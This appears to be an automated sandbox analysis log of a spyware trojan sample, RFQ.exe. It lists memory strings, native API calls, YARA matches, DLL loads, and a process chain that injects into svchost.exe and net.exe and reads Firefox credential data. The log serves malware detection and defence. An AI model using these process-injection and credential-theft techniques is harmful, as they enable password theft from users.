                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10335
                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 00000003.00000003.1995564180.0000000007D56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: net.exe, 00000003.00000002.3508009639.0000000004016000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003A36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=4nk.education
                Source: net.exe, 00000003.00000002.3509615989.0000000006330000.00000004.00000800.00020000.00000000.sdmp, net.exe, 00000003.00000002.3508009639.0000000004982000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000043A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=astorg-group.info
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 00000003.00000002.3508009639.0000000004016000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3509615989.0000000006330000.00000004.00000800.00020000.00000000.sdmp, net.exe, 00000003.00000002.3508009639.0000000004982000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000043A2000.00000004.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003A36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: net.exe, 00000003.00000002.3508009639.000000000433A000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3508009639.00000000041A8000.00000004.10000000.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003BC8000.00000004.00000001.00040000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006FEA26 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006FEA26
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006FEC91 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_006FEC91
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006FEA26 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006FEA26
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006EA975 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_006EA975
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00719468 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00719468

                E-Banking Fraud

                Source: Yara matchFile source: 1.2.svchost.exe.3a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1820800178.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3506950733.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\RFQ.exeCode function: This is a third-party compiled AutoIt script.0_2_0068445D
                Source: RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: RFQ.exe, 00000000.00000000.1659266041.0000000000742000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e31b94aa-3
                Source: RFQ.exe, 00000000.00000000.1659266041.0000000000742000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4e882fcf-1
                Source: RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a4c7d24c-0
                Source: RFQ.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_13bda58a-1
                Source: initial sampleStatic PE information: Filename: RFQ.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_003CCA43 NtClose,1_2_003CCA43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B60 NtClose,LdrInitializeThunk,1_2_03172B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03172DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031735C0 NtCreateMutant,LdrInitializeThunk,1_2_031735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174340 NtSetContextThread,1_2_03174340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174650 NtSuspendThread,1_2_03174650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B80 NtQueryInformationFile,1_2_03172B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BA0 NtEnumerateValueKey,1_2_03172BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BF0 NtAllocateVirtualMemory,1_2_03172BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BE0 NtQueryValueKey,1_2_03172BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AB0 NtWaitForSingleObject,1_2_03172AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AD0 NtReadFile,1_2_03172AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AF0 NtWriteFile,1_2_03172AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F30 NtCreateSection,1_2_03172F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F60 NtCreateProcessEx,1_2_03172F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F90 NtProtectVirtualMemory,1_2_03172F90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03173010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03173090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03173D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03173D70 NtOpenThread
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E4340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E4650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E39B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2FA0 NtQuerySection
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E2CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E3010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E3090 NtSetValueKey
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E3D70 NtOpenThread
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034E3D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_00B19310 NtCreateFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_00B19480 NtReadFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_00B19580 NtDeleteFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_00B19620 NtClose
Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_00B19780 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006ED509 CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006E1145 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006EE814 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03187E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0312B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03175130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 031BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 031AEA12 appears 86 times
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: String function: 0068B606 appears 31 times
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: String function: 006A48F3 appears 49 times
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: String function: 006A09B0 appears 46 times
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: String function: 00683536 appears 31 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 0349B970 appears 262 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 0351EA12 appears 86 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 034E5130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 034F7E54 appears 107 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 0352F290 appears 103 times
                Source: RFQ.exe, 00000000.00000003.1671543209.000000000426D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exe, 00000000.00000003.1671016595.00000000040C3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@12/8
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F36D3 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006E1003 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006E1607 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F50EB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_0070A5A3 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F63AC _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00686122 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\RFQ.exe | File created: C:\Users\user\AppData\Local\Temp\unbarricadoed
                Source: RFQ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\RFQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: net.exe, 00000003.00000002.3506249546.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000003.1996466077.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3506249546.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RFQ.exe | ReversingLabs: Detection: 62%
                Source: unknown | Process created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Users\user\Desktop\RFQ.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Section loaded: rasadhlp.dll
